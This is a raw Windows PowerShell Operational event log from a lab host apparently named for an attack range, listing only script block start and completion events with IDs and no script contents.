06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477354
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477353
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477352
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477351
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477350
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477349
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477348
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477347
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477346
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477345
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477344
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477343
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477342
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477341
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477340
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477339
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477338
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477337
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477336
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477335
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477334
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477333
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477332
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477331
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477330
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477329
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477328
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477327
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477326
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477325
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477324
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477323
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477322
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477321
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477320
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477319
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477318
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477317
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477316
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477315
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477314
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477313
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477312
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477311
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477310
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477309
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477308
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477307
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477306
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477305
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477304
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477303
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477302
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477301
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477300
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477299
Keywords=None
